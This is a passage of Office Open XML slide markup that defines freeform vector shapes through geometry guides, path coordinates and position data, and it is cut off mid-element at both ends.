                    <a:gd name="T87" fmla="*/ 136 h 568"/>
                    <a:gd name="T88" fmla="*/ 126 w 547"/>
                    <a:gd name="T89" fmla="*/ 167 h 568"/>
                    <a:gd name="T90" fmla="*/ 121 w 547"/>
                    <a:gd name="T91" fmla="*/ 183 h 568"/>
                    <a:gd name="T92" fmla="*/ 126 w 547"/>
                    <a:gd name="T93" fmla="*/ 199 h 568"/>
                    <a:gd name="T94" fmla="*/ 142 w 547"/>
                    <a:gd name="T95" fmla="*/ 236 h 568"/>
                    <a:gd name="T96" fmla="*/ 179 w 547"/>
                    <a:gd name="T97" fmla="*/ 283 h 568"/>
                    <a:gd name="T98" fmla="*/ 289 w 547"/>
                    <a:gd name="T99" fmla="*/ 188 h 5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547" h="568">
                      <a:moveTo>
                        <a:pt x="263" y="383"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="263" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="536" y="288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="524"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="335"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="335"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="130"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="157"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="383"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="247" y="147"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="247" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="130"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="195" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="167"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="167"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="183"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="14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7" name="Freeform 62"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6838950" y="5391150"/>
                  <a:ext cx="263525" cy="255588"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 457 w 731"/>
                    <a:gd name="T1" fmla="*/ 556 h 709"/>
                    <a:gd name="T2" fmla="*/ 493 w 731"/>
                    <a:gd name="T3" fmla="*/ 566 h 709"/>
                    <a:gd name="T4" fmla="*/ 530 w 731"/>
                    <a:gd name="T5" fmla="*/ 561 h 709"/>
                    <a:gd name="T6" fmla="*/ 572 w 731"/>
                    <a:gd name="T7" fmla="*/ 530 h 709"/>
                    <a:gd name="T8" fmla="*/ 593 w 731"/>
                    <a:gd name="T9" fmla="*/ 467 h 709"/>
                    <a:gd name="T10" fmla="*/ 588 w 731"/>
                    <a:gd name="T11" fmla="*/ 435 h 709"/>
                    <a:gd name="T12" fmla="*/ 562 w 731"/>
                    <a:gd name="T13" fmla="*/ 398 h 709"/>
                    <a:gd name="T14" fmla="*/ 525 w 731"/>
                    <a:gd name="T15" fmla="*/ 378 h 709"/>
                    <a:gd name="T16" fmla="*/ 488 w 731"/>
                    <a:gd name="T17" fmla="*/ 372 h 709"/>
                    <a:gd name="T18" fmla="*/ 441 w 731"/>
                    <a:gd name="T19" fmla="*/ 383 h 709"/>
                    <a:gd name="T20" fmla="*/ 336 w 731"/>
                    <a:gd name="T21" fmla="*/ 435 h 709"/>
                    <a:gd name="T22" fmla="*/ 257 w 731"/>
                    <a:gd name="T23" fmla="*/ 461 h 709"/>
                    <a:gd name="T24" fmla="*/ 184 w 731"/>
                    <a:gd name="T25" fmla="*/ 467 h 709"/>
                    <a:gd name="T26" fmla="*/ 116 w 731"/>
                    <a:gd name="T27" fmla="*/ 435 h 709"/>
                    <a:gd name="T28" fmla="*/ 47 w 731"/>
                    <a:gd name="T29" fmla="*/ 372 h 709"/>
                    <a:gd name="T30" fmla="*/ 0 w 731"/>
                    <a:gd name="T31" fmla="*/ 251 h 709"/>
                    <a:gd name="T32" fmla="*/ 21 w 731"/>
                    <a:gd name="T33" fmla="*/ 173 h 709"/>
                    <a:gd name="T34" fmla="*/ 73 w 731"/>
                    <a:gd name="T35" fmla="*/ 89 h 709"/>
                    <a:gd name="T36" fmla="*/ 147 w 731"/>
                    <a:gd name="T37" fmla="*/ 31 h 709"/>
                    <a:gd name="T38" fmla="*/ 220 w 731"/>
                    <a:gd name="T39" fmla="*/ 0 h 709"/>
                    <a:gd name="T40" fmla="*/ 299 w 731"/>
                    <a:gd name="T41" fmla="*/ 5 h 709"/>
                    <a:gd name="T42" fmla="*/ 393 w 731"/>
                    <a:gd name="T43" fmla="*/ 68 h 709"/>
                    <a:gd name="T44" fmla="*/ 257 w 731"/>
                    <a:gd name="T45" fmla="*/ 147 h 709"/>
                    <a:gd name="T46" fmla="*/ 226 w 731"/>
                    <a:gd name="T47" fmla="*/ 136 h 709"/>
                    <a:gd name="T48" fmla="*/ 173 w 731"/>
                    <a:gd name="T49" fmla="*/ 147 h 709"/>
                    <a:gd name="T50" fmla="*/ 147 w 731"/>
                    <a:gd name="T51" fmla="*/ 178 h 709"/>
                    <a:gd name="T52" fmla="*/ 136 w 731"/>
                    <a:gd name="T53" fmla="*/ 215 h 709"/>
                    <a:gd name="T54" fmla="*/ 136 w 731"/>
                    <a:gd name="T55" fmla="*/ 246 h 709"/>
                    <a:gd name="T56" fmla="*/ 168 w 731"/>
                    <a:gd name="T57" fmla="*/ 283 h 709"/>
                    <a:gd name="T58" fmla="*/ 220 w 731"/>
                    <a:gd name="T59" fmla="*/ 309 h 709"/>
                    <a:gd name="T60" fmla="*/ 252 w 731"/>
                    <a:gd name="T61" fmla="*/ 309 h 709"/>
                    <a:gd name="T62" fmla="*/ 410 w 731"/>
                    <a:gd name="T63" fmla="*/ 241 h 709"/>
                    <a:gd name="T64" fmla="*/ 483 w 731"/>
                    <a:gd name="T65" fmla="*/ 215 h 709"/>
                    <a:gd name="T66" fmla="*/ 546 w 731"/>
                    <a:gd name="T67" fmla="*/ 215 h 709"/>
                    <a:gd name="T68" fmla="*/ 598 w 731"/>
                    <a:gd name="T69" fmla="*/ 231 h 709"/>
                    <a:gd name="T70" fmla="*/ 651 w 731"/>
                    <a:gd name="T71" fmla="*/ 267 h 709"/>
                    <a:gd name="T72" fmla="*/ 724 w 731"/>
                    <a:gd name="T73" fmla="*/ 388 h 709"/>
                    <a:gd name="T74" fmla="*/ 719 w 731"/>
                    <a:gd name="T75" fmla="*/ 477 h 709"/>
                    <a:gd name="T76" fmla="*/ 640 w 731"/>
                    <a:gd name="T77" fmla="*/ 608 h 709"/>
                    <a:gd name="T78" fmla="*/ 557 w 731"/>
                    <a:gd name="T79" fmla="*/ 682 h 709"/>
                    <a:gd name="T80" fmla="*/ 478 w 731"/>
                    <a:gd name="T81" fmla="*/ 708 h 709"/>
                    <a:gd name="T82" fmla="*/ 363 w 731"/>
                    <a:gd name="T83" fmla="*/ 672 h 709"/>
                    <a:gd name="T84" fmla="*/ 404 w 731"/>
                    <a:gd name="T85" fmla="*/ 509 h 7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731" h="709">
                      <a:moveTo>
                        <a:pt x="420" y="525"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="420" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="514" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="551" y="545"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="577" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="456"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="456"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="330"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="205" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="514" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="714" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="724" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="730" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="730" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="477"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="704" y="519"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="677" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="608"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="608"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="682"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="520" y="698"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="692"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="672"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="326" y="640"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="304" y="619"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="509"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="525"/>
                      </a:ln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8" name="Freeform 63"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7016750" y="5294313"/>
                  <a:ext cx="204788" cy="195262"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 289 w 569"/>
                    <a:gd name="T1" fmla="*/ 367 h 541"/>
                    <a:gd name="T2" fmla="*/ 331 w 569"/>
                    <a:gd name="T3" fmla="*/ 393 h 541"/>
                    <a:gd name="T4" fmla="*/ 373 w 569"/>
                    <a:gd name="T5" fmla="*/ 409 h 541"/>
                    <a:gd name="T6" fmla="*/ 410 w 569"/>
                    <a:gd name="T7" fmla="*/ 409 h 541"/>
                    <a:gd name="T8" fmla="*/ 426 w 569"/>
                    <a:gd name="T9" fmla="*/ 404 h 541"/>
                    <a:gd name="T10" fmla="*/ 436 w 569"/>
                    <a:gd name="T11" fmla="*/ 388 h 541"/>
                    <a:gd name="T12" fmla="*/ 452 w 569"/>
                    <a:gd name="T13" fmla="*/ 362 h 541"/>
                    <a:gd name="T14" fmla="*/ 447 w 569"/>
                    <a:gd name="T15" fmla="*/ 331 h 541"/>
                    <a:gd name="T16" fmla="*/ 431 w 569"/>
                    <a:gd name="T17" fmla="*/ 299 h 541"/>
                    <a:gd name="T18" fmla="*/ 478 w 569"/>
                    <a:gd name="T19" fmla="*/ 162 h 541"/>
                    <a:gd name="T20" fmla="*/ 515 w 569"/>
                    <a:gd name="T21" fmla="*/ 194 h 541"/>
                    <a:gd name="T22" fmla="*/ 557 w 569"/>
                    <a:gd name="T23" fmla="*/ 262 h 541"/>
                    <a:gd name="T24" fmla="*/ 568 w 569"/>
                    <a:gd name="T25" fmla="*/ 294 h 541"/>
                    <a:gd name="T26" fmla="*/ 557 w 569"/>
                    <a:gd name="T27" fmla="*/ 367 h 541"/>
                    <a:gd name="T28" fmla="*/ 510 w 569"/>
                    <a:gd name="T29" fmla="*/ 446 h 541"/>
                    <a:gd name="T30" fmla="*/ 488 w 569"/>
                    <a:gd name="T31" fmla="*/ 472 h 541"/>
                    <a:gd name="T32" fmla="*/ 441 w 569"/>
                    <a:gd name="T33" fmla="*/ 514 h 541"/>
                    <a:gd name="T34" fmla="*/ 415 w 569"/>
                    <a:gd name="T35" fmla="*/ 525 h 541"/>
                    <a:gd name="T36" fmla="*/ 368 w 569"/>
                    <a:gd name="T37" fmla="*/ 535 h 541"/>
                    <a:gd name="T38" fmla="*/ 321 w 569"/>
                    <a:gd name="T39" fmla="*/ 535 h 541"/>
                    <a:gd name="T40" fmla="*/ 279 w 569"/>
                    <a:gd name="T41" fmla="*/ 519 h 541"/>
                    <a:gd name="T42" fmla="*/ 231 w 569"/>
                    <a:gd name="T43" fmla="*/ 499 h 541"/>
                    <a:gd name="T44" fmla="*/ 147 w 569"/>
                    <a:gd name="T45" fmla="*/ 436 h 541"/>
                    <a:gd name="T46" fmla="*/ 64 w 569"/>
                    <a:gd name="T47" fmla="*/ 362 h 541"/>
                    <a:gd name="T48" fmla="*/ 32 w 569"/>
                    <a:gd name="T49" fmla="*/ 320 h 541"/>
                    <a:gd name="T50" fmla="*/ 11 w 569"/>
                    <a:gd name="T51" fmla="*/ 278 h 541"/>
                    <a:gd name="T52" fmla="*/ 0 w 569"/>
                    <a:gd name="T53" fmla="*/ 236 h 541"/>
                    <a:gd name="T54" fmla="*/ 0 w 569"/>
                    <a:gd name="T55" fmla="*/ 189 h 541"/>
                    <a:gd name="T56" fmla="*/ 6 w 569"/>
                    <a:gd name="T57" fmla="*/ 162 h 541"/>
                    <a:gd name="T58" fmla="*/ 37 w 569"/>
                    <a:gd name="T59" fmla="*/ 110 h 541"/>
                    <a:gd name="T60" fmla="*/ 53 w 569"/>
                    <a:gd name="T61" fmla="*/ 78 h 541"/>
                    <a:gd name="T62" fmla="*/ 116 w 569"/>
                    <a:gd name="T63" fmla="*/ 26 h 541"/>
                    <a:gd name="T64" fmla="*/ 132 w 569"/>
                    <a:gd name="T65" fmla="*/ 10 h 541"/>
                    <a:gd name="T66" fmla="*/ 216 w 569"/>
                    <a:gd name="T67" fmla="*/ 0 h 541"/>
                    <a:gd name="T68" fmla="*/ 263 w 569"/>
                    <a:gd name="T69" fmla="*/ 10 h 541"/>
                    <a:gd name="T70" fmla="*/ 305 w 569"/>
                    <a:gd name="T71" fmla="*/ 31 h 541"/>
                    <a:gd name="T72" fmla="*/ 405 w 569"/>
                    <a:gd name="T73" fmla="*/ 94 h 541"/>
                    <a:gd name="T74" fmla="*/ 258 w 569"/>
                    <a:gd name="T75" fmla="*/ 336 h 541"/>
                    <a:gd name="T76" fmla="*/ 231 w 569"/>
                    <a:gd name="T77" fmla="*/ 136 h 541"/>
                    <a:gd name="T78" fmla="*/ 211 w 569"/>
                    <a:gd name="T79" fmla="*/ 126 h 541"/>
                    <a:gd name="T80" fmla="*/ 190 w 569"/>
                    <a:gd name="T81" fmla="*/ 121 h 541"/>
                    <a:gd name="T82" fmla="*/ 158 w 569"/>
                    <a:gd name="T83" fmla="*/ 121 h 541"/>
                    <a:gd name="T84" fmla="*/ 142 w 569"/>
